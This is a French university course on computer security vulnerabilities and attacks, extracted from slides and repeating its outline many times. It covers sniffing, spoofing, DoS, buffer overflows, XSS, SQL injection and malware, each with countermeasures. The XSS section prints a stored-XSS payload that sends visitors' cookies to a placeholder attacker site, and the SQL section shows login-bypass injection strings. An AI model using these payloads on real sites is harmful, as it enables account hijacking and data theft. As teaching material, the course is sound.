Chapitre 2
Chapitre 2
Chapitre 2
Cours :
SÉCURITÉ INFORMATIQUE
Préparé par :
DR. MAROUA BAKRI
Niveau : II3
PLAN DU CHAPITRE 2
VULNÉRABILITÉS ET ATTAQUES DE SÉCURITÉ
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
Exemple :
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
Cartographie
L’attaque par cartographie du réseau est une attaque qui permet de découvrir les artères de
communication d'un système d’information cible.
Plusieurs techniques peuvent être utilisées pour cartographier un réseau, à savoir :
Techniques non-intrusives (non-détectables) :
– Utilisation des ressources publiques : le Web, Usenet.
– Utilisation des outils réseau : Whois, nslookup.
Techniques semi-intrusives (détectables à l'aide d’un système de détection d'intrusion) :
– Utilisation des outils réseau : ping et traceroute.
N.B : Le principe de fonctionnement de Traceroute consiste à envoyer des paquets ICMP ECHO
Request avec un paramètre Time-To-Live (TTL) de plus en plus grand (en commençant à 1).
Chaque routeur qui reçoit un paquet IP en décrémente le TTL avant de le transmettre. Lorsque le
TTL atteint 0, le routeur émet un paquet ICMP d'erreur Time to live exceeded vers la source.
Traceroute découvre ainsi les routeurs de proche en proche. Dans la réponse d'un ping, le
paramètre TTL permet également de déterminer le nombre de routeurs qui ont été traversés
pour effectuer le retour.
Techniques intrusives (détectables) :
– Utilisation des propriétés des protocoles : SNMP, RPC.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 221
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Sniffing
Le Sniffing ou reniflement de trafics constitue l’une des méthodes couramment
utilisée par les pirates informatiques pour espionner le trafic sur le réseau.
Pour ce faire, les pirates informatiques utilisent des sniffers réseau ou renifleurs
de réseau, des sortes de sondes que l'on place sur un réseau pour pouvoir le
surveiller et soustraire frauduleusement les différents types de données
confidentielles susceptibles de les intéresser surtout lorsque ces informations
sont transférées par des protocoles qui ne sont pas suffisamment sécurisés
comme : FTP, DNS, HTTP.
Sniffing
Passive sniffing : à travers un hub
Lorsqu'une machine veut communiquer avec une autre sur un réseau non-switché
(relié par un hub), elle envoie ses messages sur le réseau à l'ensemble des machines
et normalement seule la machine destinataire intercepte le message pour le lire, alors
que les autres l'ignorent. Ainsi en utilisant la méthode du sniffing, il est possible
d'écouter le trafic passant par un adaptateur réseau (carte réseau, carte réseau sans
fil…). Le sniffer décompose ces messages et les rassemble, ainsi les informations
peuvent être analysées à des fins frauduleuses (détecter des logins, des mots de
passe, des emails).
Sniffing
Contre-mesures :
Détection des machines (cartes réseau) qui utilisent le mode « promiscuous1 ».
pour cela, on peut soit utiliser un AntiSniff (un logiciel permettant la détection
des machines du réseau qui sont en cours d'exécution en mode promiscuous),
soit envoyer par exemple une requête ARP en "pseudo-broadcast". Ainsi, si la
machine répond, sa carte est en mode promiscuous, sinon elle ne l'est
probablement pas.
1 : « Promiscuous mode » ou « mode promiscuité » se réfère à une configuration de la carte réseau, qui
permet à celle-ci d'accepter tous les paquets qu'elle reçoit, même si ceux-ci ne lui sont pas adressés.
IP spoofing
IP spoofing
C souhaite usurper l’identité de A auprès de B.
IP spoofing
Contre-mesures :
Vérifier que son système n'a pas des numéros de séquence TCP facilement
prédictible.
ARP spoofing
L'attaque ARP spoofing vise les réseaux locaux Ethernet, qu'ils soient
partitionnés ou non en sous-réseaux.
ARP spoofing
Contre-mesures :
DNS spoofing
L’attaque du DNS spoofing vise la redirection des Internautes vers des sites
pirates.
DNS ID spoofing
DNS spoofing
Contre-mesures :
Mettre à jour les serveurs DNS pour éviter la prédictibilité des numéros
d'identification et les failles permettant de prendre le contrôle du serveur.
Configurer le serveur DNS pour qu'il ne résolve directement que les noms
des machines du domaine sur lequel il a autorité.
Man-in-the-middle
L'attaque de l'homme du milieu ou man-in-the-middle attack est une attaque qui vise
l’interception des communications entre deux parties, sans que ni l'une ni l'autre ne
puisse se douter que le canal de communication entre elles a été compromis.
Replay attack
Une attaque par re-jeu (ou replay attack) est une forme d'attaque réseau dans
laquelle une transmission est malicieusement ou frauduleusement répétée par une
tierce partie interceptant les paquets sur la ligne.
Exemple :
Supposons qu'Alice veuille prouver son identité à Bob. Bob demande le mot de passe
à Alice, que cette dernière envoie (après l'avoir crypté). Pendant ce temps Ève écoute
la conversation et stocke le message contenant le mot de passe. Une fois l'échange
terminé, Ève contacte Bob en se faisant passer pour Alice. Quand Bob lui demande
son mot de passe, Ève renvoie le message qu'elle avait préalablement intercepté sans
pour autant le comprendre (car il est chiffré). Bob croit donc avoir une
communication avec Alice.
Contre-mesure :
Le déni de service ou "Denial-Of-Service" (DOS) est une attaque très évoluée visant à
rendre muette une machine en la submergeant de trafic inutile.
Il peut y avoir plusieurs machines à l'origine de cette attaque. On parle alors d’une
attaque distribuée (DDoS) qui vise à anéantir des serveurs, des sous-réseaux …
Contre-mesures :
Configurer le firewall pour filtrer les paquets ICMP echo request ou les limiter à
un pourcentage de la bande passante.
Configurer le routeur pour désactiver le broadcast.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 391
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Mail bombing
Cette attaque consiste à envoyer un nombre faramineux d'emails (plusieurs milliers
par exemple) à un ou plusieurs destinataires.
Le but étant de :
saturer le serveur de mails
saturer la bande passante du serveur et du ou des destinataires,
rendre impossible aux destinataires de continuer à utiliser l'adresse électronique.
Contre-mesures :
Posséder plusieurs boîte aux lettres : une principale que vous ne divulguez
qu'aux personnes dignes de confiance, et une à laquelle vous tenez moins,
utilisée par exemple pour s'inscrire à des services en ligne sur Internet ;
Installer un logiciel antispam qui interdira la réception de plusieurs messages
identiques à un intervalle de temps trop court.
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
L’outil le plus utilisé pour le balayage de port est Nmap. Il s’agit d’un logiciel gratuit
permettant de détecter comment réagissent les ports d’une machine. Il donne aussi
accès à des informations telles que le système d’exploitation utilisé, sa version et
certains logiciels installés sur la machine cible.
Contre-mesures :
Utilisation d’un firewall et d’un système de détection d’intrusion.
Contre-mesure :
Utilisation d'autres techniques pour la protection par mots de passe tq les
méthodes d'authentification forte.
Buffers overflow
Un buffer overflow est une attaque très efficace et assez compliquée à réaliser qui
vise à exploiter une faille ou une faiblesse dans une application (type browser, logiciel
de mail...) pour exécuter un code malveillant qui compromettra la cible (acquisition
des droits administrateur...).
L’objectif de cette attaque est de faire crasher un programme en écrivant dans un
buffer (une zone mémoire temporaire utilisée par une application) plus de données
qu'il ne peut en contenir afin d'écraser des parties du code de l'application vulnérable
et d'injecter des données utiles pour exploiter le crash de l'application.
Nous distinguons deux types de codes malveillants pouvant être exécutés dans une
attaque de buffer overflow :
1. Un code provoquant une sorte de déni de service monopolisant un ensemble ou
un sous-ensemble des ressources de la machine. (Boucle infinie)
2. Un code permettant d'exécuter des routines du système dans un but d'intrusion
ou de destruction. (Shellcode)
Une attaque par buffer overflow signifie en général que l'on a affaire à des
attaquants doués plutôt qu'à des "script kiddies".
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 471
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Buffers Overflow
Buffers overflow
Contre-mesures :
Le code injecté n'est pas enregistrée ni dans un fichier ni dans une base de données
sur le serveur web.
À première vue, le XSS réfléchi n'est pas un problème grave parce que l'utilisateur
peut seulement injecter du code dans ses propres pages. Cependant, avec un peu
d'ingénierie sociale, un attaquant peut convaincre un utilisateur de suivre une URL
piégée qui injecte du code dans la page de résultat, ce qui donne à l'attaquant tout
contrôle sur le contenu de cette page.
Exemple :
Soit le site « http://www.sitevulnerable.net », un site vulnérable à une attaque de type
XSS réfléchi car il permet d'afficher sur sa page d'accueil un message de bienvenue
affichant le nom de l'utilisateur passé en paramètre :
http://www. sitevulnerable.net/?nom=aaa
Code injecté :
http://www. sitevulnerable.net/?nom=<b>aaa</b>
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 51 1
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Il s’agit de la faille XSS la plus sérieuse car le script est sauvegardé dans un fichier ou
une base de données sur le serveur Web. Il sera donc affiché à chaque ouverture du
site. Exemple : un forum dans lequel les utilisateurs peuvent poster des
commentaires.
Exemple :
Code injecté sous forme de commentaire :
<img src="azerty.jpg" onerror="window.location=
'http://www.site_du_hacker.com/recuperation_cookie.php?cookie='+document.cook
ie;" hidden>
Ce script HTML/JavaScript redirige l'utilisateur s'il y a une erreur lors du chargement
de l'image (tout est bien sûr calculé pour qu'il y ait une erreur) vers la page de
récuperation_cookie.php, et tout ça en communiquant le contenu de votre cookie
dans l'URL. Sur la page recuperation_cookie.php, le pirate n'aura qu'à récupérer la
variable cookie grâce à un GET et la stocker dans un fichier et par conséquent détenir
vos informations personnelles.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 521
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Contre-mesure :
La seule façon viable d'empêcher les attaques Cross-Site Scripting consiste à
concevoir des sites web non vulnérables. Pour ce faire, le concepteur d'un site
web doit :
– Vérifier le format des données entrées par les utilisateurs ;
– Encoder les données utilisateurs affichées en remplaçant les
caractères spéciaux par leurs équivalents HTML.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 531
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Injection SQL
L'injection SQL directe est une technique où un pirate modifie une requête SQL
existante pour afficher des données cachées, ou pour écraser des valeurs
importantes, ou encore exécuter des commandes dangereuses pour la base.
Exemples :
– SELECT * FROM utilisateurs WHERE login='jean' # AND password='‘
Grâce à cette injection l'utilisateur va pouvoir se connecter à n'importe quel
compte ayant comme login « jean » sans connaitre son mot de passe.
– En utilisant, les conditions toujours vraies comme 1 = 1 :
SELECT * FROM admin WHERE login='' OR '1'='1' AND pass='' OR '1'='1'
Contre-mesures :
Pour l'injection dans les variables qui contiennent des chaînes de caractères :
éviter (d’échapper) les caractères spéciaux à l’aide de
« mysqli_real_escape_string() » ;
Pour l'injection dans les variables numériques : utiliser intval() et is_numeric() ;
Logiciels malveillants
Programmes autoreproducteurs :
Virus
Vers
Infections informatiques :
Bombe logique
Cheval de Troie
Porte dérobée (Backdoor)
Spyware
Adware
Keylogger
Rootkit
Logiciels malveillants
Contre-mesures :
– Utilisation d'un firewall pour filtrer ce qui vient d'extranet.
– Utilisation d'au moins un antivirus, remis à jour très régulièrement et exécuté
régulièrement pour la protection contre les virus, les vers...
– Utilisation d’un anti-espion pour la recherche des spywares, backdoors, rootkits …
– Contrôle d’intégrité pour vérifier si le système a été altéré ;
– Utilisation de détecteur d’intrusions pour la recherche de la présence d’un intrus ;
Logiciels malveillants
Virus
Un virus est un programme parasite autopropageable et autoreproducteur.
Les virus sont dépendants du système d'exploitation ou d'un logiciel (un virus
informatique ne peut être activé que par l’exécution d’un programme porteur du virus).
Ils se propagent, comme toutes données binaires par :
disquettes, CD ROM, clés USB …
réseaux (Internet, LAN …)
Freewares, sharewares sur le web
Mails news (attachements, carnets d’adresses)
Plugins pour les navigateurs
…
Les conséquences de la présence d’un virus sont multiples :
Ralentissement système.
Blocage système.
Crash système.
Pertes de données …
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 571
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Logiciels malveillants
Virus
Types de virus :
Virus exécutables :
– « Virus de remplacement » : écrasent des programmes avec eux-mêmes
– « Virus parasites » : s’attachent à des programmes, en tête, en queue, ou dans des
cavités, et infectent et causent des dommages lorsqu’ils sont exécutés.
Virus résidents : cachés en RAM en permanence, ils infectent chaque application exécutée.
Virus du secteur Boot : infectent les fichiers de démarrage, et se multiplient en démarrage.
Virus pilotes : chargés « officiellement » par le système, exécutés en mode noyau.
Virus polymorphe : mute à chaque infection, difficile à détecter sa signature.
Virus métamorphique : se réécrit complètement à chaque fois et change son
comportement.
Macros / scripts : VB dans Office, ELisp dans Emacs etc. Transmission par mail croissante. Peu
de qualifications requises.
Virus source : contaminent les sources plutôt que les exécutables.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 581
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Logiciels malveillants
Antivirus
Fonctions basiques :
– Détection : détermine que l’infection par un virus s’est produite
– Identification : identifie le virus spécifique relié à l’infection
– suppression : supprime les virus de programmes infectés
Antivirus de Première Génération :
– exigent la signature de virus (structure, modèle binaire, les caractères génériques) pour
identifier les virus ;
– mémorisent la longueur des programmes et recherchent les changements ;
Antivirus de deuxième génération :
– utilisent des règles heuristiques et la recherche de l’infection probable ;
– cherchent des portions cryptées de codes et déterminent les clés privées ;
– vérifient l’intégrité en utilisant les empreintes digitales, les hash codes ;
Antivirus de troisième génération :
– résident dans la mémoire et identifient les virus par leurs actions et non signature ;
Antivirus de quatrième génération :
– package contenant des Techniques AV multiples qui limitent la capacité d’infection des virus ;
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 591
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Logiciels malveillants
Vers
Les vers sont des programmes parasites, actifs et autonomes qui peuvent se répliquer
à des hôtes distants sans déclenchement.
Leur réplication n’infecte généralement pas les programmes hôtes.
Parce qu’ils se propagent de manière autonome, ils peuvent se propager beaucoup
plus rapidement que les virus !
Leur vitesse de propagation fait que les vers constituent les menaces les plus
importantes.
Les conséquences de la présence des vers sont multiples :
Ralentissement système.
Blocage système.
Crash système.
Pertes de données.
…
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 601
Vulnérabilités Ingénierie sociale
Attaques de sécurité Les attaques réseaux
Typologie des attaquants Les attaques système
Logiciels malveillants
Bombe logique
Une bombe logique est une infection qui attend un évènement (date, action, données
particulières, un utilisateur particulier, une série particulière de frappes de clavier, …)
appelé en général “gâchette” pour exécuter sa fonction offensive.
Une fois déclenchée, le système est endommagé.
Elle modifie/supprime des fichiers/disques.
Logiciels malveillants
Chevaux de Troie
Les chevaux de Troie ("Trojan horses" ou "Trojans" en anglais) tirent leur nom de la
célèbre légende mythologique grecque.
Il s’agit de programmes qui semblent avoir une fonction mais en fait ils effectuent une
autre (lorsqu’il est exécuté, un cheval de Troie performe d’autres tâches
qu’annoncées). Généralement, ils ressemblent à des programmes que l’utilisateur est
attiré à exécuter. Ex : jeu ; mise à jour d’un software…
Leur objectif est le plus souvent d'ouvrir une porte dérobée ("backdoor") sur le
système cible, permettant par la suite à l'attaquant de revenir à loisir épier, collecter
des données, les corrompre, contrôler voire même détruire le système.
Contrairement aux virus et aux vers, les chevaux de Troie ne se reproduisent pas.
Logiciels malveillants
Porte dérobée
Une porte dérobée (Backdoor/Trapdoor) est un moyen de contourner les mécanismes
de contrôle d’accès. Il s’agit d’une faille du système de sécurité qui provient soit d’une
faute de conception (volontaire ou accidentelle), soit d’une altération du système
durant sa phase opérationnelle.
Spyware
Un spyware est une infection dont l’objectif est de divulguer à un attaquant des
informations issues du système infecté. Il se trouve généralement dans le code d'un
programme que l'utilisateur téléchargera innocemment sur internet.
Adware
Un adware est une infection dont l’objectif est d’envoyer à l’utilisateur du système
infecté de la publicité ciblée. Pour ce faire, il espionne les habitudes de l’utilisateur.
Logiciels malveillants
Key Loggers
Les Key Loggers sont des enregistreurs de touches et par extension des
enregistreurs d'activités informatiques permettant d'enregistrer les touches
utilisées par un utilisateur sur son clavier et tous les évènements déclenchés.
Les touches enregistrées permettent effectivement de retracer non seulement le
travail courant, mais aussi de récupérer tous les identifiants et mots de passes.
RootKit
Un rootkit est un programme parasite permettant à un attaquant de maintenir dans
le temps un contrôle frauduleux sur un système informatique.
Son but principal est de transformer en zombie le PC infecté en le reliant à un
nœud d'un immense réseau d'ordinateurs puis l’utiliser pour lancer des attaques
indirectement (utilisé souvent pour lancer des attaques DDoS).
Contre-mesures :
Ne pas répondre au spam, car cela peut permettre aux spammeurs de savoir
que votre adresse électronique est valide.
Utilisation d’un anti-spam.
1 Vulnérabilités
Vulnérabilités au niveau organisationnel
Vulnérabilités au niveau physique
Vulnérabilités au niveau technologique
2 Attaques de sécurité
Ingénierie sociale
Les attaques réseaux
Les attaques système
Hackers
Les hackers sont des professionnels de la sécurité informatique qui recherchent et repèrent
les failles des systèmes et réseaux au profit d’une entreprise dans le but de les corriger. C’est
les gentils ”chapeaux blancs” (White hat hacker) : consultants, administrateurs.
Crackers
Les crackers sont des professionnels qui recherchent, repèrent et exploitent les failles des
systèmes et réseaux sans autorisations et pour des buts illégaux. C’est les méchants
”chapeaux noirs” (Black hat hacker) : créateurs de virus, cyber-espions, cyber-terroristes…
Script Kiddies
Des amateurs (des pirates néophytes) qui piratent en exploitant des programmes écrits par
d’autres. Ils ne disposent que de peu de connaissances sur leur mode de fonctionnement et
cherchent souvent à impressionner par leurs toutes nouvelles connaissances en
informatique. Les script Kiddies ont en moyenne 12-15 ans.
SÉCURITÉ INFORMATIQUE - II3 MAROUA BAKRI ENSI 701